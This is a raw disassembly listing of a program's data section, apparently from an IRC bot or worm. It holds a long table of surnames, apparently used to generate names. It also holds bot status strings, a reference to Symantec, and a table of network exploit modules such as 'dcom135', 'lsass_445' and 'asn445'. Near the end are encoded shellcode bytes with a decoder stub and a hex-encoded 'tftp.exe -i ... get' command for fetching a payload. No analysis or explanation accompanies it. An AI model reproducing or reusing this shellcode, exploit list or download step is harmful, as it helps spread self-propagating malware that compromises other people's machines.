aDirksen db 'Dirksen',0 ; DATA XREF: .data:0042DE38�o
aDionysius db 'Dionysius',0 ; DATA XREF: .data:0042DE34�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: .data:0042DE30�o
align 4
aDifronzo db 'Difronzo',0 ; DATA XREF: .data:0042DE2C�o
align 10h
aDifabio db 'Difabio',0 ; DATA XREF: .data:0042DE28�o
aDiefenbach db 'Diefenbach',0 ; DATA XREF: .data:0042DE24�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: .data:0042DE20�o
align 4
aDFini db 'D',27h,'fini',0 ; DATA XREF: .data:0042DE1C�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: .data:0042DE18�o
aDesombre db 'Desombre',0 ; DATA XREF: .data:0042DE14�o
align 4
aDenison db 'Denison',0 ; DATA XREF: .data:0042DE10�o
aDenham db 'Denham',0 ; DATA XREF: .data:0042DE0C�o
align 4
aDenault db 'Denault',0 ; DATA XREF: .data:0042DE08�o
aDemusz db 'Demusz',0 ; DATA XREF: .data:0042DE04�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: .data:0042DE00�o
align 4
aDeming db 'Deming',0 ; DATA XREF: .data:0042DDFC�o
align 4
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: .data:0042DDF8�o
align 4
aDelger db 'Delger',0 ; DATA XREF: .data:0042DDF4�o
align 10h
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: .data:0042DDF0�o
align 10h
aDelattre db 'Delattre',0 ; DATA XREF: .data:0042DDEC�o
align 4
aDefeciani db 'Defeciani',0 ; DATA XREF: .data:0042DDE8�o
align 4
aDees db 'Dees',0 ; DATA XREF: .data:0042DDE4�o
align 10h
aDebroff db 'Debroff',0 ; DATA XREF: .data:0042DDE0�o
aDerousse db 'deRousse',0 ; DATA XREF: .data:0042DDDC�o
align 4
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: .data:0042DDD8�o
align 10h
aDelapena db 'DeLaPena',0 ; DATA XREF: .data:0042DDD4�o
align 4
aDegennaro db 'DeGennaro',0 ; DATA XREF: .data:0042DDD0�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: .data:0042DDCC�o
aDavid db 'David',0 ; DATA XREF: .data:0042DDC8�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: .data:0042DDC4�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: .data:0042DDC0�o
align 4
aDas db 'Das',0 ; DATA XREF: .data:0042DDBC�o
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: .data:0042DDB8�o
aDapice db 'Dapice',0 ; DATA XREF: .data:0042DDB4�o
align 4
aDante db 'Dante',0 ; DATA XREF: .data:0042DDB0�o
align 4
aDanieli db 'Danieli',0 ; DATA XREF: .data:0042DDAC�o
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: .data:0042DDA8�o
aDaly db 'Daly',0 ; DATA XREF: .data:0042DDA4�o
align 4
aDaldalian db 'Daldalian',0 ; DATA XREF: .data:0042DDA0�o
align 10h
aDasilva db 'daSilva',0 ; DATA XREF: .data:0042DD9C�o
aCyders db 'Cyders',0 ; DATA XREF: .data:0042DD98�o
align 10h
aCvek db 'Cvek',0 ; DATA XREF: .data:0042DD94�o
align 4
aCutler db 'Cutler',0 ; DATA XREF: .data:0042DD90�o
align 10h
aCurrier db 'Currier',0 ; DATA XREF: .data:0042DD8C�o
aCui db 'Cui',0 ; DATA XREF: .data:0042DD88�o
aCroxton db 'Croxton',0 ; DATA XREF: .data:0042DD84�o
aCroxen db 'Croxen',0 ; DATA XREF: .data:0042DD80�o
align 4
aCroshaw db 'Croshaw',0 ; DATA XREF: .data:0042DD7C�o
aCrocker db 'Crocker',0 ; DATA XREF: .data:0042DD78�o
aCrawford db 'Crawford',0 ; DATA XREF: .data:0042DD74�o
align 4
aCoutaux db 'Coutaux',0 ; DATA XREF: .data:0042DD70�o
aCounter db 'Counter',0 ; DATA XREF: .data:0042DD6C�o
aCosmides db 'Cosmides',0 ; DATA XREF: .data:0042DD68�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: .data:0042DD64�o
aCorey db 'Corey',0 ; DATA XREF: .data:0042DD60�o
align 4
aConnors db 'Connors',0 ; DATA XREF: .data:0042DD5C�o
aCondodina db 'Condodina',0 ; DATA XREF: .data:0042DD58�o
align 4
aConcino db 'Concino',0 ; DATA XREF: .data:0042DD54�o
aComstock db 'Comstock',0 ; DATA XREF: .data:0042DD50�o
align 4
aCompton db 'Compton',0 ; DATA XREF: .data:0042DD48�o
; .data:0042DD4C�o
aCollis db 'Collis',0 ; DATA XREF: .data:0042DD44�o
align 4
aCollard db 'Collard',0 ; DATA XREF: .data:0042DD40�o
aColella db 'Colella',0 ; DATA XREF: .data:0042DD3C�o
aColdren db 'Coldren',0 ; DATA XREF: .data:0042DD38�o
aCoito db 'Coito',0 ; DATA XREF: .data:0042DD34�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: .data:0042DD30�o
aClow db 'Clow',0 ; DATA XREF: .data:0042DD2C�o
align 4
aClifton db 'Clifton',0 ; DATA XREF: .data:0042DD28�o
aClement db 'Clement',0 ; DATA XREF: .data:0042DD24�o
aClark db 'Clark',0 ; DATA XREF: .data:0042DD20�o
align 4
aClancy db 'Clancy',0 ; DATA XREF: .data:0042DD1C�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: .data:0042DD18�o
aCifarelli db 'Cifarelli',0 ; DATA XREF: .data:0042DD14�o
align 10h
aCicero db 'Cicero',0 ; DATA XREF: .data:0042DD10�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: .data:0042DD0C�o
align 4
aChurch db 'Church',0 ; DATA XREF: .data:0042DD08�o
align 4
aChupasko db 'Chupasko',0 ; DATA XREF: .data:0042DD04�o
align 4
aChu db 'Chu',0 ; DATA XREF: .data:0042DD00�o
aChristopher db 'Christopher',0 ; DATA XREF: .data:0042DCFC�o
aChristie db 'Christie',0 ; DATA XREF: .data:0042DCF8�o
align 4
aChristiano db 'Christiano',0 ; DATA XREF: .data:0042DCF4�o
align 10h
aChristian db 'Christian',0 ; DATA XREF: .data:0042DCF0�o
align 4
aChristenson db 'Christenson',0 ; DATA XREF: .data:0042DCEC�o
aChinman db 'Chinman',0 ; DATA XREF: .data:0042DCE8�o
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: .data:0042DCE4�o
aChilds db 'Childs',0 ; DATA XREF: .data:0042DCE0�o
align 4
aChildress db 'Childress',0 ; DATA XREF: .data:0042DCDC�o
align 10h
aChien db 'Chien',0 ; DATA XREF: .data:0042DCD8�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: .data:0042DCD4�o
align 4
aChervinsky db 'Chervinsky',0 ; DATA XREF: .data:0042DCD0�o
align 10h
aCherry db 'Cherry',0 ; DATA XREF: .data:0042DCCC�o
align 4
aCheang db 'Cheang',0 ; DATA XREF: .data:0042DCC8�o
align 10h
aCharles db 'Charles',0 ; DATA XREF: .data:0042DCC4�o
aChapman db 'Chapman',0 ; DATA XREF: .data:0042DCC0�o
aCerioli db 'Cerioli',0 ; DATA XREF: .data:0042DCBC�o
aCeniceros db 'Ceniceros',0 ; DATA XREF: .data:0042DCB8�o
align 4
aCavell db 'Cavell',0 ; DATA XREF: .data:0042DCB4�o
align 4
aCavanagh db 'Cavanagh',0 ; DATA XREF: .data:0042DCB0�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: .data:0042DCAC�o
align 4
aCaspar db 'Caspar',0 ; DATA XREF: .data:0042DCA8�o
align 4
aCase db 'Case',0 ; DATA XREF: .data:0042DCA4�o
align 4
aCascio db 'Cascio',0 ; DATA XREF: .data:0042DCA0�o
align 4
aCartmill db 'Cartmill',0 ; DATA XREF: .data:0042DC9C�o
align 4
aCarper db 'Carper',0 ; DATA XREF: .data:0042DC98�o
align 10h
aCaroti db 'Caroti',0 ; DATA XREF: .data:0042DC94�o
align 4
aCarmichael db 'Carmichael',0 ; DATA XREF: .data:0042DC90�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: .data:0042DC8C�o
aCarlos db 'Carlos',0 ; DATA XREF: .data:0042DC88�o
align 4
aCarlin db 'Carlin',0 ; DATA XREF: .data:0042DC84�o
align 4
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: .data:0042DC80�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: .data:0042DC7C�o
aCapursi db 'Capursi',0 ; DATA XREF: .data:0042DC78�o
aCappuccio db 'Cappuccio',0 ; DATA XREF: .data:0042DC74�o
align 4
aCapodilupo db 'Capodilupo',0 ; DATA XREF: .data:0042DC70�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: .data:0042DC6C�o
align 4
aCaperton db 'Caperton',0 ; DATA XREF: .data:0042DC68�o
align 10h
aCapanni db 'Capanni',0 ; DATA XREF: .data:0042DC64�o
aCanley db 'Canley',0 ; DATA XREF: .data:0042DC60�o
align 10h
aCammilleri db 'Cammilleri',0 ; DATA XREF: .data:0042DC5C�o
align 4
aCammelli db 'Cammelli',0 ; DATA XREF: .data:0042DC58�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: .data:0042DC54�o
align 10h
aCage db 'Cage',0 ; DATA XREF: .data:0042DC50�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: .data:0042DC4C�o
align 10h
aByerly db 'Byerly',0 ; DATA XREF: .data:0042DC48�o
align 4
aByatt db 'Byatt',0 ; DATA XREF: .data:0042DC44�o
align 10h
aBusetta db 'Busetta',0 ; DATA XREF: .data:0042DC40�o
aBurridge db 'Burridge',0 ; DATA XREF: .data:0042DC3C�o
align 4
aBurke db 'Burke',0 ; DATA XREF: .data:0042DC38�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: .data:0042DC34�o
align 4
aBurden db 'Burden',0 ; DATA XREF: .data:0042DC30�o
align 4
aBunton db 'Bunton',0 ; DATA XREF: .data:0042DC2C�o
align 4
aBullard db 'Bullard',0 ; DATA XREF: .data:0042DC28�o
aBudding db 'Budding',0 ; DATA XREF: .data:0042DC24�o
aBuchan db 'Buchan',0 ; DATA XREF: .data:0042DC20�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: .data:0042DC1C�o
aBrook db 'Brook',0 ; DATA XREF: .data:0042DC18�o
align 4
aBroca db 'Broca',0 ; DATA XREF: .data:0042DC14�o
align 4
aBritz db 'Britz',0 ; DATA XREF: .data:0042DC10�o
align 4
aBrinton db 'Brinton',0 ; DATA XREF: .data:0042DC0C�o
aBridges db 'Bridges',0 ; DATA XREF: .data:0042DC08�o
aBridgeman db 'Bridgeman',0 ; DATA XREF: .data:0042DC04�o
align 4
aBrewer db 'Brewer',0 ; DATA XREF: .data:0042DBFC�o
; .data:0042DC00�o
align 10h
aBrennan db 'Brennan',0 ; DATA XREF: .data:0042DBF8�o
aBrenan db 'Brenan',0 ; DATA XREF: .data:0042DBF4�o
align 10h
aBreed db 'Breed',0 ; DATA XREF: .data:0042DBF0�o
align 4
aBrecht db 'Brecht',0 ; DATA XREF: .data:0042DBEC�o
align 10h
aBradach db 'Bradach',0 ; DATA XREF: .data:0042DBE8�o
aBradac db 'Bradac',0 ; DATA XREF: .data:0042DBE4�o
align 10h
aBracalente db 'Bracalente',0 ; DATA XREF: .data:0042DBE0�o
align 4
aBoyne db 'Boyne',0 ; DATA XREF: .data:0042DBDC�o
align 4
aBoym db 'Boym',0 ; DATA XREF: .data:0042DBD8�o
align 4
aBoyland db 'Boyland',0 ; DATA XREF: .data:0042DBD4�o
aBoyes db 'Boyes',0 ; DATA XREF: .data:0042DBD0�o
align 4
aBoyajian db 'Boyajian',0 ; DATA XREF: .data:0042DBCC�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: .data:0042DBC8�o
align 10h
aBowers db 'Bowers',0 ; DATA XREF: .data:0042DBC4�o
align 4
aBourneuf db 'Bourneuf',0 ; DATA XREF: .data:0042DBC0�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: .data:0042DBBC�o
aBoudin db 'Boudin',0 ; DATA XREF: .data:0042DBB8�o
align 4
aBotosh db 'Botosh',0 ; DATA XREF: .data:0042DBB4�o
align 4
aBothman db 'Bothman',0 ; DATA XREF: .data:0042DBB0�o
aBossi db 'Bossi',0 ; DATA XREF: .data:0042DBAC�o
align 4
aBorden db 'Borden',0 ; DATA XREF: .data:0042DBA8�o
align 4
aBorack db 'Borack',0 ; DATA XREF: .data:0042DBA4�o
align 4
aBoorstin db 'Boorstin',0 ; DATA XREF: .data:0042DBA0�o
align 4
aBoone db 'Boone',0 ; DATA XREF: .data:0042DB9C�o
align 10h
aBookbinder db 'Bookbinder',0 ; DATA XREF: .data:0042DB98�o
align 4
aBook db 'Book',0 ; DATA XREF: .data:0042DB94�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: .data:0042DB90�o
align 10h
aBoniface db 'Boniface',0 ; DATA XREF: .data:0042DB8C�o
align 4
aBonham db 'Bonham',0 ; DATA XREF: .data:0042DB88�o
align 4
aBoner db 'Boner',0 ; DATA XREF: .data:0042DB84�o
align 4
aBologna db 'Bologna',0 ; DATA XREF: .data:0042DB80�o
aBollinger db 'Bollinger',0 ; DATA XREF: .data:0042DB7C�o
align 10h
aBolick db 'Bolick',0 ; DATA XREF: .data:0042DB78�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: .data:0042DB74�o
align 10h
aBlyth db 'Blyth',0 ; DATA XREF: .data:0042DB70�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: .data:0042DB6C�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: .data:0042DB68�o
align 4
aBloembergen db 'Bloembergen',0 ; DATA XREF: .data:0042DB64�o
aBloch db 'Bloch',0 ; DATA XREF: .data:0042DB60�o
align 10h
aBlizard db 'Blizard',0 ; DATA XREF: .data:0042DB5C�o
aBliss db 'Bliss',0 ; DATA XREF: .data:0042DB58�o
align 10h
aBlanke db 'Blanke',0 ; DATA XREF: .data:0042DB54�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: .data:0042DB50�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: .data:0042DB4C�o
align 4
aBlackwell db 'Blackwell',0 ; DATA XREF: .data:0042DB48�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: .data:0042DB44�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: .data:0042DB40�o
align 4
aBisema db 'Bisema',0 ; DATA XREF: .data:0042DB3C�o
align 4
aBir db 'Bir',0 ; DATA XREF: .data:0042DB38�o
aBinion db 'Binion',0 ; DATA XREF: .data:0042DB34�o
align 10h
aBickel db 'Bickel',0 ; DATA XREF: .data:0042DB30�o
align 4
aBiagioli db 'Biagioli',0 ; DATA XREF: .data:0042DB2C�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: .data:0042DB28�o
aBetti db 'Betti',0 ; DATA XREF: .data:0042DB24�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: .data:0042DB20�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: .data:0042DB1C�o
align 10h
aBernassola db 'Bernassola',0 ; DATA XREF: .data:0042DB18�o
align 4
aBernardo db 'Bernardo',0 ; DATA XREF: .data:0042DB14�o
align 4
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: .data:0042DB10�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: .data:0042DB0C�o
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: .data:0042DB08�o
align 10h
aBelloc db 'Belloc',0 ; DATA XREF: .data:0042DB04�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: .data:0042DB00�o
aBellhouse db 'Bellhouse',0 ; DATA XREF: .data:0042DAFC�o
align 4
aBellavance db 'Bellavance',0 ; DATA XREF: .data:0042DAF8�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: .data:0042DAF4�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: .data:0042DAF0�o
align 10h
aBelaoussof db 'Belaoussof',0 ; DATA XREF: .data:0042DAEC�o
align 4
aBelanger db 'Belanger',0 ; DATA XREF: .data:0042DAE8�o
align 4
aBehenna db 'Behenna',0 ; DATA XREF: .data:0042DAE4�o
aBedford db 'Bedford',0 ; DATA XREF: .data:0042DAE0�o
aBeder db 'Beder',0 ; DATA XREF: .data:0042DADC�o
align 10h
aBeckman db 'Beckman',0 ; DATA XREF: .data:0042DAD8�o
aBean db 'Bean',0 ; DATA XREF: .data:0042DAD4�o
align 10h
aBeal db 'Beal',0 ; DATA XREF: .data:0042DAD0�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: .data:0042DACC�o
align 10h
aBayo db 'Bayo',0 ; DATA XREF: .data:0042DAC8�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: .data:0042DAC4�o
align 10h
aBaumiller db 'Baumiller',0 ; DATA XREF: .data:0042DAC0�o
align 4
aBatchelder db 'Batchelder',0 ; DATA XREF: .data:0042DABC�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: .data:0042DAB8�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: .data:0042DAB4�o
align 10h
aBartoo db 'Bartoo',0 ; DATA XREF: .data:0042DAB0�o
align 4
aBartolome db 'Bartolome',0 ; DATA XREF: .data:0042DAAC�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: .data:0042DAA8�o
aBarry db 'Barry',0 ; DATA XREF: .data:0042DAA4�o
align 4
aBarriola db 'Barriola',0 ; DATA XREF: .data:0042DAA0�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: .data:0042DA9C�o
aBarneson db 'Barneson',0 ; DATA XREF: .data:0042DA98�o
align 4
aBarbetti db 'Barbetti',0 ; DATA XREF: .data:0042DA94�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: .data:0042DA90�o
aBaranowska db 'Baranowska',0 ; DATA XREF: .data:0042DA8C�o
align 4
aBaranczak db 'Baranczak',0 ; DATA XREF: .data:0042DA88�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: .data:0042DA84�o
aBarabesi db 'Barabesi',0 ; DATA XREF: .data:0042DA80�o
align 4
aBanta db 'Banta',0 ; DATA XREF: .data:0042DA7C�o
align 10h
aBaltz db 'Baltz',0 ; DATA XREF: .data:0042DA78�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: .data:0042DA74�o
align 10h
aBallatori db 'Ballatori',0 ; DATA XREF: .data:0042DA70�o
align 4
aBaleja db 'Baleja',0 ; DATA XREF: .data:0042DA6C�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: .data:0042DA68�o
align 10h
aBailar db 'Bailar',0 ; DATA XREF: .data:0042DA64�o
align 4
aBagnold db 'Bagnold',0 ; DATA XREF: .data:0042DA60�o
aBaglivo db 'Baglivo',0 ; DATA XREF: .data:0042DA5C�o
aBady db 'Bady',0 ; DATA XREF: .data:0042DA58�o
align 10h
aBackus db 'Backus',0 ; DATA XREF: .data:0042DA54�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: .data:0042DA50�o
align 4
aAzima db 'Azima',0 ; DATA XREF: .data:0042DA4C�o
align 4
aAyling db 'Ayling',0 ; DATA XREF: .data:0042DA48�o
align 4
aAykroyd db 'Aykroyd',0 ; DATA XREF: .data:0042DA44�o
aAyiemba db 'Ayiemba',0 ; DATA XREF: .data:0042DA40�o
aAxworthy db 'Axworthy',0 ; DATA XREF: .data:0042DA3C�o
align 10h
aAxelrod db 'Axelrod',0 ; DATA XREF: .data:0042DA38�o
aAurelius db 'Aurelius',0 ; DATA XREF: .data:0042DA34�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: .data:0042DA30�o
align 10h
aAtkins db 'Atkins',0 ; DATA XREF: .data:0042DA2C�o
align 4
aArky db 'Arky',0 ; DATA XREF: .data:0042DA28�o
align 10h
aArjas db 'Arjas',0 ; DATA XREF: .data:0042DA24�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: .data:0042DA20�o
align 4
aArellano db 'Arellano',0 ; DATA XREF: .data:0042DA1C�o
align 10h
aArduini db 'Arduini',0 ; DATA XREF: .data:0042DA18�o
aArbia db 'Arbia',0 ; DATA XREF: .data:0042DA14�o
align 10h
aAntos db 'Antos',0 ; DATA XREF: .data:0042DA10�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: .data:0042DA0C�o
aAnsley db 'Ansley',0 ; DATA XREF: .data:0042DA08�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: .data:0042DA04�o
align 4
aAndron db 'Andron',0 ; DATA XREF: .data:0042DA00�o
align 4
aAndrelus db 'Andrelus',0 ; DATA XREF: .data:0042D9FC�o
align 4
aAndo db 'Ando',0 ; DATA XREF: .data:0042D9F8�o
align 10h
aAndel db 'Andel',0 ; DATA XREF: .data:0042D9F4�o
align 4
aAnand db 'Anand',0 ; DATA XREF: .data:0042D9F0�o
align 10h
aAmsden db 'Amsden',0 ; DATA XREF: .data:0042D9EC�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: .data:0042D9E8�o
align 10h
aAmatangelo db 'Amatangelo',0 ; DATA XREF: .data:0042D9E4�o
align 4
aAmaral db 'Amaral',0 ; DATA XREF: .data:0042D9E0�o
align 4
aAltenhofen db 'Altenhofen',0 ; DATA XREF: .data:0042D9DC�o
align 10h
aAltenberger db 'Altenberger',0 ; DATA XREF: .data:0042D9D8�o
aAltavilla db 'Altavilla',0 ; DATA XREF: .data:0042D9D4�o
align 4
aAlongi db 'Alongi',0 ; DATA XREF: .data:0042D9D0�o
align 10h
aAllison db 'Allison',0 ; DATA XREF: .data:0042D9CC�o
aAleks db 'Aleks',0 ; DATA XREF: .data:0042D9C8�o
align 10h
aAlda db 'Alda',0 ; DATA XREF: .data:0042D9C4�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: .data:0042D9C0�o
align 10h
aAlavi db 'Alavi',0 ; DATA XREF: .data:0042D9BC�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: .data:0042D9B8�o
align 10h
aAdorno db 'Adorno',0 ; DATA XREF: .data:0042D9B4�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: .data:0042D9B0�o
align 10h
aAdelstein db 'Adelstein',0 ; DATA XREF: .data:0042D9AC�o
align 4
aAddison db 'Addison',0 ; DATA XREF: .data:off_42D9A8�o
aAdams db 'Adams',0 ; DATA XREF: .data:0042D9A4�o
align 4
aAckerman db 'Ackerman',0 ; DATA XREF: .data:0042D9A0�o
align 4
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: .data:off_42D99C�o
align 4
byte_4315F4 db 50h ; DATA XREF: .text:0040ABE6�o
; .text:0040ABF3�r
db 43h, 2 dup(0)
dword_4315F8 dd 7C7325h ; DATA XREF: .text:0040AC91�o
aS_0 db '[%s]|',0 ; DATA XREF: .text:0040AD9B�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40AD92�o
; sub_41AF8F:loc_41B052�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040AD8B�o
aXp db 'XP',0 ; DATA XREF: .text:0040AD7D�o
; .text:0040AF89�o ...
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040AD6D�o
; .text:0040AF79�o ...
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040AD54�o
; .text:0040AF60�o ...
align 4
a98 db '98',0 ; DATA XREF: .text:0040AD44�o
; .text:0040AF50�o ...
align 4
aNt_0 db 'NT',0 ; DATA XREF: .text:0040AD34�o
; .text:0040AF41�o ...
align 10h
a95 db '95',0 ; DATA XREF: .text:0040AD26�o
; .text:0040AF33�o ...
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_40ADE1+3A�o
align 4
aM db '[M]',0 ; DATA XREF: sub_40ADE1+2C�o
; sub_40ADE1+57�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40ADE1+18�o
; sub_41875E+5�o
align 4
aSSSS_0 db '%s|%s|%s|%s|',0 ; DATA XREF: .text:0040B0D6�o
align 4
a99 db '99',0 ; DATA XREF: .text:loc_40B098�o
align 4
a0D db '0%d',0 ; DATA XREF: .text:0040B072�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: .text:0040B054�o
; sub_41ADD8+52�o
off_43165C dd offset byte_4B4E55 ; DATA XREF: .text:0040B037�o
dword_431660 dd 345053h ; DATA XREF: .text:0040B02D�o
dword_431664 dd 34h ; DATA XREF: .text:0040B021�o
dword_431668 dd 335053h ; DATA XREF: .text:0040B014�o
dword_43166C dd 33h ; DATA XREF: .text:0040B003�o
dword_431670 dd 325053h ; DATA XREF: .text:0040AFF6�o
dword_431674 dd 32h ; DATA XREF: .text:0040AFE5�o
dword_431678 dd 315053h ; DATA XREF: .text:0040AFD8�o
dword_43167C dd 305053h ; DATA XREF: .text:0040AFBA�o
dword_431680 dd 4E55h ; DATA XREF: .text:loc_40AF9E�o
dword_431684 dd 3332h ; DATA XREF: .text:0040AF97�o
dword_431688 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B2B3+C4�o
db 66h, 0B9h
word_431696 dw 0FFFFh ; DATA XREF: sub_40B2B3+CC�w
db 80h, 73h, 0Eh
byte_43169B db 0FFh ; DATA XREF: sub_40B2B3+D3�w
dd 0F9E243h
dword_4316A0 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B2B3+A2�o
db 0B1h
byte_4316AD db 0FFh ; DATA XREF: sub_40B2B3+AA�w
dw 7380h
db 0Ch
byte_4316B1 db 0FFh ; DATA XREF: sub_40B2B3+B0�w
dw 0E243h
dd 0F9h
dword_4316B8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40B13C+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_43171C dd 12h ; DATA XREF: sub_40B13C+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40B13C+79�o
aJ_0 db 'j',0
db 0E8h
dword_431735 dd 17h ; DATA XREF: sub_40B13C+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_43173D dd 1 ; DATA XREF: sub_40B13C+45�w
byte_431741 db 0, 6Ah, 0 ; DATA XREF: sub_40B13C+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_43174B dd 0FFFFFFEDh ; DATA XREF: sub_40B13C+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
dword_43177C dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B477+10�o
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B648+51�o
align 4
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B648+35�o
align 10h
aSym db 'sym',0 ; DATA XREF: sub_40C3E8+169�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40BA9E+30�o
; .text:0040E229�o ...
align 4
dd 5 dup(0)
dword_4317F8 dd 0B97h ; DATA XREF: sub_401ACD+1D42�r
; sub_401ACD+1D6A�o ...
off_4317FC dd offset sub_40EAE9 ; DATA XREF: sub_40C3E8+1EA�r
dword_431800 dd 0 ; DATA XREF: sub_40B90E+2E�o
; .text:0040D759�w ...
dword_431804 dd 1 ; DATA XREF: sub_40BD91+1F�r
dword_431808 dd 1 ; DATA XREF: sub_40BD91+3B3�r
dword_43180C dd 0 ; DATA XREF: sub_40BD91+292�r
aDcom135 db 'dcom135',0
dd 63440000h, 33316D6Fh, 35h, 5 dup(0)
dd 87h, 40DF4Ch, 0
dd 1, 2 dup(0)
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch, 40EC1Fh, 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 4
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40D59Dh, 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 4
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh, 40D59Dh, 0
dd 2 dup(1), 0
aVncs db 'vncs',0
align 4
dd 54480000h, 562D5054h, 434Eh, 5 dup(0)
dd 170Ch, 41B6A1h, 4 dup(0)
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 40E830h, 0
dd 2 dup(1), 2 dup(0)
dd 10100h, 0Eh dup(0)
aAsn445_0 db 'asn445',0
align 4
db 2 dup(0)
byte_4319DA db 1 ; DATA XREF: sub_401ACD:loc_403789�r
; sub_401ACD+1CC6�o
aDcom135_0 db 'dcom135',0
align 4
dd 100h, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
